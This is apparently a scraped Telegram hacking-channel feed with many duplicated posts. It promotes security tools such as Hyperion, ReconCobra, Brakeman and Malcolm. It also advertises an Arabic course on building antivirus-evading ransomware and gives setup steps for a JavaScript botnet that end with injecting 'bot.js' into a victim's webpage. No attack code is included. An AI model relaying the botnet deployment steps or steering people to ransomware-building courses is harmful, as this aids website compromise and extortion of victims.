The Hacking Library pinned «Photos from National Cyber Security Services's post Morpheus:-- Automated #Ettercap TCP/ #IP (MITM-hijacking Tool). #Morpheus it's a Man-In-The-Middle (#MITM) suite that allows users to manipulate #TCP/ #UDP data using #Ettercap, urlsnarf, msgsnarf, and…»
Photos from National Cyber Security Services's post
Hyperion:-- Hyperion-Project #Automate #recognition Pentesting "passif".
The program #Hyperion is a program called "Automate", playing the role of #Swiss #Knife in the step of recognition, #pentesting.
This one, gathers several programs in 1 only, to facilitate the so-called "passive" Pentesting step. The objective is to facilitate the testing of networks, #machines, services, as well as the detection of potential security #flaws constituting the #audited network.
#Download #Link:-
https://github.com/F0rbidden-Equation/Hyperion
Hyperion:-- Hyperion-Project #Automate #recognition Pentesting "passif".
The program #Hyperion is a program called "Automate", playing the role of #Swiss #Knife in the step of recognition, #pentesting.
This one, gathers several programs in 1 only, to facilitate the so-called "passive" Pentesting step. The objective is to facilitate the testing of networks, #machines, services, as well as the detection of potential security #flaws constituting the #audited network.
#Download #Link:-
https://github.com/F0rbidden-Equation/Hyperion
Forwarded from جامع النافع
كورس كيفبه برمجه فايروس الفديه
#حصري_جدا|
فكرة عن الدورة
تعلم كيف تبني فيروس فدية خبيث بحيث يمكنه التحايل على برامج مضادات الفيروسات ويقوم بمساومة المستخدم على ملفاته الهامة
ملحوظة : الدورة للاغراض العلمية والوقائية وغير مسموح باستخدامها في اضرار الاخرين
التحميل https://www.mr-lunix.ml/p/blog-page_30.html
الحجم 4.4 giga
لا تنسخ CH : @mr_lunixes
#حصري_جدا|
فكرة عن الدورة
تعلم كيف تبني فيروس فدية خبيث بحيث يمكنه التحايل على برامج مضادات الفيروسات ويقوم بمساومة المستخدم على ملفاته الهامة
ملحوظة : الدورة للاغراض العلمية والوقائية وغير مسموح باستخدامها في اضرار الاخرين
التحميل https://www.mr-lunix.ml/p/blog-page_30.html
الحجم 4.4 giga
لا تنسخ CH : @mr_lunixes
Photos from National Cyber Security Services's post
ReconCobra:-- Complete #Automated #Pentest #Framework for #Information #Gathering.
The software has 82 Options with full #automation and #powerful information gathering.
#Reconcobra is #Footprinting software for Ultimate Information Gathering
#Kali, #Parrot OS, #BlackArch, #Termux, #Android Led TV.
Introduction:-
1. ReconCobra is useful in #Banks, Private #Organisations and #Ethical #hacker #personnel for legal #auditing.
2. It serves as a defense method to find as much information possible for gaining unauthorized access and intrusion.
3. With the emergence of more advanced #technology, cybercriminals have also found more ways to get into the system of many organizations.
4. ReconCobra #software can #audit, #firewall behavior, if it is leaking backend machines/server and replying pings, it can find internal and external networks where many software’s like #ERP, mail firewalls are installed, exposing servers so it does Footprinting, Scanning & #Enumeration as much as possible of target, to discover and collect most possible information like username, #web #technologies, files, endpoint, #API and much more.
5. It’s the first step to stop #cyber #criminals by securing your Infrastructural Information Gathering leakage. ReconCobra is false positive free when there is something it will show no matter what, if it is not, it will give blank results rather error.
#Download #Link:-
https://github.com/haroonawanofficial/ReconCobra
ReconCobra:-- Complete #Automated #Pentest #Framework for #Information #Gathering.
The software has 82 Options with full #automation and #powerful information gathering.
#Reconcobra is #Footprinting software for Ultimate Information Gathering
#Kali, #Parrot OS, #BlackArch, #Termux, #Android Led TV.
Introduction:-
1. ReconCobra is useful in #Banks, Private #Organisations and #Ethical #hacker #personnel for legal #auditing.
2. It serves as a defense method to find as much information possible for gaining unauthorized access and intrusion.
3. With the emergence of more advanced #technology, cybercriminals have also found more ways to get into the system of many organizations.
4. ReconCobra #software can #audit, #firewall behavior, if it is leaking backend machines/server and replying pings, it can find internal and external networks where many software’s like #ERP, mail firewalls are installed, exposing servers so it does Footprinting, Scanning & #Enumeration as much as possible of target, to discover and collect most possible information like username, #web #technologies, files, endpoint, #API and much more.
5. It’s the first step to stop #cyber #criminals by securing your Infrastructural Information Gathering leakage. ReconCobra is false positive free when there is something it will show no matter what, if it is not, it will give blank results rather error.
#Download #Link:-
https://github.com/haroonawanofficial/ReconCobra
Brakeman:-- A #static #analysis #security #vulnerability #scanner for #Ruby on #Rails #applications
#Compatibility:-
Brakeman should work with any version of Rails from 2.3.x to 6.x.
#Brakeman can analyze #code written with Ruby 1.8 syntax and #newer but requires at least Ruby 2.3.0 to run.
Brakeman assigns a confidence level to each #warning. This provides a rough estimate of how certain the tool is that a given warning is actually a problem. Naturally, these ratings should not be taken as absolute truth.
There are three levels of confidence:-
1. High - Either this is a simple warning (#boolean value) or user input is very likely being used in unsafe ways.
2. Medium - This generally indicates an unsafe use of a variable, but the #variable may or may not be user input.
3. Weak - Typically means user input was indirectly used in a potentially unsafe manner.
#Download #Link:-
https://github.com/presidentbeef/brakeman
Brakeman:-- A #static #analysis #security #vulnerability #scanner for #Ruby on #Rails #applications
#Compatibility:-
Brakeman should work with any version of Rails from 2.3.x to 6.x.
#Brakeman can analyze #code written with Ruby 1.8 syntax and #newer but requires at least Ruby 2.3.0 to run.
Brakeman assigns a confidence level to each #warning. This provides a rough estimate of how certain the tool is that a given warning is actually a problem. Naturally, these ratings should not be taken as absolute truth.
There are three levels of confidence:-
1. High - Either this is a simple warning (#boolean value) or user input is very likely being used in unsafe ways.
2. Medium - This generally indicates an unsafe use of a variable, but the #variable may or may not be user input.
3. Weak - Typically means user input was indirectly used in a potentially unsafe manner.
#Download #Link:-
https://github.com/presidentbeef/brakeman
#Compatibility:-
Brakeman should work with any version of Rails from 2.3.x to 6.x.
#Brakeman can analyze #code written with Ruby 1.8 syntax and #newer but requires at least Ruby 2.3.0 to run.
Brakeman assigns a confidence level to each #warning. This provides a rough estimate of how certain the tool is that a given warning is actually a problem. Naturally, these ratings should not be taken as absolute truth.
There are three levels of confidence:-
1. High - Either this is a simple warning (#boolean value) or user input is very likely being used in unsafe ways.
2. Medium - This generally indicates an unsafe use of a variable, but the #variable may or may not be user input.
3. Weak - Typically means user input was indirectly used in a potentially unsafe manner.
#Download #Link:-
https://github.com/presidentbeef/brakeman
Brakeman:-- A #static #analysis #security #vulnerability #scanner for #Ruby on #Rails #applications
#Compatibility:-
Brakeman should work with any version of Rails from 2.3.x to 6.x.
#Brakeman can analyze #code written with Ruby 1.8 syntax and #newer but requires at least Ruby 2.3.0 to run.
Brakeman assigns a confidence level to each #warning. This provides a rough estimate of how certain the tool is that a given warning is actually a problem. Naturally, these ratings should not be taken as absolute truth.
There are three levels of confidence:-
1. High - Either this is a simple warning (#boolean value) or user input is very likely being used in unsafe ways.
2. Medium - This generally indicates an unsafe use of a variable, but the #variable may or may not be user input.
3. Weak - Typically means user input was indirectly used in a potentially unsafe manner.
#Download #Link:-
https://github.com/presidentbeef/brakeman
4K-Botnet:-- A #simple and #easy to use #JS #Botnet.
How to #Setup:-
1. Clone repository
2. Upload the "Botnet" folder to your #webserver
3. Edit "bot.js"
Change the "SERVER_URL" variable to your #website's #URL
Change the "api_dev_key" variable to match your Pastebin's account key
Change the "api_user_key" variable to match your Pastebin's account key
4. Done
How to use it?
1. Edit the "cmds.txt" file - Each #command on a separate line
2. Inject "bot.js" into the victim's #webpage
#Download #Link:-
https://github.com/4k-developer/4K-Botnet
4K-Botnet:-- A #simple and #easy to use #JS #Botnet.
How to #Setup:-
1. Clone repository
2. Upload the "Botnet" folder to your #webserver
3. Edit "bot.js"
Change the "SERVER_URL" variable to your #website's #URL
Change the "api_dev_key" variable to match your Pastebin's account key
Change the "api_user_key" variable to match your Pastebin's account key
4. Done
How to use it?
1. Edit the "cmds.txt" file - Each #command on a separate line
2. Inject "bot.js" into the victim's #webpage
#Download #Link:-
https://github.com/4k-developer/4K-Botnet
How to #Setup:-
1. Clone repository
2. Upload the "Botnet" folder to your #webserver
3. Edit "bot.js"
Change the "SERVER_URL" variable to your #website's #URL
Change the "api_dev_key" variable to match your Pastebin's account key
Change the "api_user_key" variable to match your Pastebin's account key
4. Done
How to use it?
1. Edit the "cmds.txt" file - Each #command on a separate line
2. Inject "bot.js" into the victim's #webpage
#Download #Link:-
https://github.com/4k-developer/4K-Botnet
4K-Botnet:-- A #simple and #easy to use #JS #Botnet.
How to #Setup:-
1. Clone repository
2. Upload the "Botnet" folder to your #webserver
3. Edit "bot.js"
Change the "SERVER_URL" variable to your #website's #URL
Change the "api_dev_key" variable to match your Pastebin's account key
Change the "api_user_key" variable to match your Pastebin's account key
4. Done
How to use it?
1. Edit the "cmds.txt" file - Each #command on a separate line
2. Inject "bot.js" into the victim's #webpage
#Download #Link:-
https://github.com/4k-developer/4K-Botnet
Photos from National Cyber Security Services's post
Malcolm:-- #Malcolm is a #powerful, easily #deployable #network #traffic #analysis #tool suite for full #packet #capture artifacts (#PCAP files) and #Zeek logs.
Malcolm is a powerful network traffic analysis tool suite designed with the following goals in mind:-
1. Easy to use:– Malcolm accepts network traffic #data in the form of full packet capture (PCAP) files and Zeek (formerly Bro) logs. These artifacts can be uploaded via a simple browser-based interface or captured live and forwarded to Malcolm using lightweight forwarders. In either case, the data is #automatically normalized, #enriched, and correlated for analysis.
2. Powerful traffic analysis:– Visibility into network communications is provided through two intuitive interfaces: #Kibana, a flexible data #visualization plugin with dozens of prebuilt #dashboards providing an at-a-glance overview of network protocols; and Moloch, a powerful tool for finding and identifying the network #sessions #comprising suspected security incidents.
3. Streamlined deployment:– Malcolm operates as a cluster of #Docker containers, isolated #sandboxes which each serves a dedicated function of the #system. This Docker-based deployment model, combined with a few simple scripts for setup and run-time management, makes Malcolm suitable to be deployed quickly across a variety of platforms and use cases, whether it be for long-term deployment on a #Linux #server in a #security operations center (SOC) or for incident response on a #Macbook for an individual engagement.
4. Secure #communications:– All #communications with Malcolm, both from the user interface and from #remote log forwarders, are secured with industry-standard #encryption #protocols.
5. Permissive license:– Malcolm is comprised of several widely used open-source tools, making it an attractive alternative to security solutions requiring paid #licenses.
6. Expanding control systems visibility:– While Malcolm is great for general-purpose network traffic analysis, its creators see a particular need in the #community for tools providing insight into protocols used in industrial control systems (ICS) environments. Ongoing Malcolm development will aim to provide additional parsers for common #ICS protocols.
#Download #Link:-
https://github.com/idaholab/Malcolm
Malcolm:-- #Malcolm is a #powerful, easily #deployable #network #traffic #analysis #tool suite for full #packet #capture artifacts (#PCAP files) and #Zeek logs.
Malcolm is a powerful network traffic analysis tool suite designed with the following goals in mind:-
1. Easy to use:– Malcolm accepts network traffic #data in the form of full packet capture (PCAP) files and Zeek (formerly Bro) logs. These artifacts can be uploaded via a simple browser-based interface or captured live and forwarded to Malcolm using lightweight forwarders. In either case, the data is #automatically normalized, #enriched, and correlated for analysis.
2. Powerful traffic analysis:– Visibility into network communications is provided through two intuitive interfaces: #Kibana, a flexible data #visualization plugin with dozens of prebuilt #dashboards providing an at-a-glance overview of network protocols; and Moloch, a powerful tool for finding and identifying the network #sessions #comprising suspected security incidents.
3. Streamlined deployment:– Malcolm operates as a cluster of #Docker containers, isolated #sandboxes which each serves a dedicated function of the #system. This Docker-based deployment model, combined with a few simple scripts for setup and run-time management, makes Malcolm suitable to be deployed quickly across a variety of platforms and use cases, whether it be for long-term deployment on a #Linux #server in a #security operations center (SOC) or for incident response on a #Macbook for an individual engagement.
4. Secure #communications:– All #communications with Malcolm, both from the user interface and from #remote log forwarders, are secured with industry-standard #encryption #protocols.
5. Permissive license:– Malcolm is comprised of several widely used open-source tools, making it an attractive alternative to security solutions requiring paid #licenses.
6. Expanding control systems visibility:– While Malcolm is great for general-purpose network traffic analysis, its creators see a particular need in the #community for tools providing insight into protocols used in industrial control systems (ICS) environments. Ongoing Malcolm development will aim to provide additional parsers for common #ICS protocols.
#Download #Link:-
https://github.com/idaholab/Malcolm
Forwarded from NusurTech 2 ©️
قناة المبرمج احمد قيصر سوف تقدم لكم
اقوى دورة في الوطن العربي بتحديات CTF
و بدأنا بنشر اول درس من الدورة و يمكنكم
متابعه الدورة على القناة الخاصة به على يوتيوب
رابط الدرس االاول ctf : https://youtu.be/DhY4S3qG8Bg
اقوى دورة في الوطن العربي بتحديات CTF
و بدأنا بنشر اول درس من الدورة و يمكنكم
متابعه الدورة على القناة الخاصة به على يوتيوب
رابط الدرس االاول ctf : https://youtu.be/DhY4S3qG8Bg
WindowsSpyBlocker:-- #Block #spying and #tracking on #Windows
#WindowsSpyBlocker is an #application written in #Go and delivered as a single #executable to block spying and tracking on Windows #systems.
The approach of this project is to capture and interpret #network #traffic based on a set of #tools. Depending on the interactions between services and source or #destination of traffic, rules are created and sorted by #assignment.
#Downlaod #Link:-
https://github.com/crazy-max/WindowsSpyBlocker
WindowsSpyBlocker:-- #Block #spying and #tracking on #Windows
#WindowsSpyBlocker is an #application written in #Go and delivered as a single #executable to block spying and tracking on Windows #systems.
The approach of this project is to capture and interpret #network #traffic based on a set of #tools. Depending on the interactions between services and source or #destination of traffic, rules are created and sorted by #assignment.
#Downlaod #Link:-
https://github.com/crazy-max/WindowsSpyBlocker
#WindowsSpyBlocker is an #application written in #Go and delivered as a single #executable to block spying and tracking on Windows #systems.
The approach of this project is to capture and interpret #network #traffic based on a set of #tools. Depending on the interactions between services and source or #destination of traffic, rules are created and sorted by #assignment.
#Downlaod #Link:-
https://github.com/crazy-max/WindowsSpyBlocker
WindowsSpyBlocker:-- #Block #spying and #tracking on #Windows
#WindowsSpyBlocker is an #application written in #Go and delivered as a single #executable to block spying and tracking on Windows #systems.
The approach of this project is to capture and interpret #network #traffic based on a set of #tools. Depending on the interactions between services and source or #destination of traffic, rules are created and sorted by #assignment.
#Downlaod #Link:-
https://github.com/crazy-max/WindowsSpyBlocker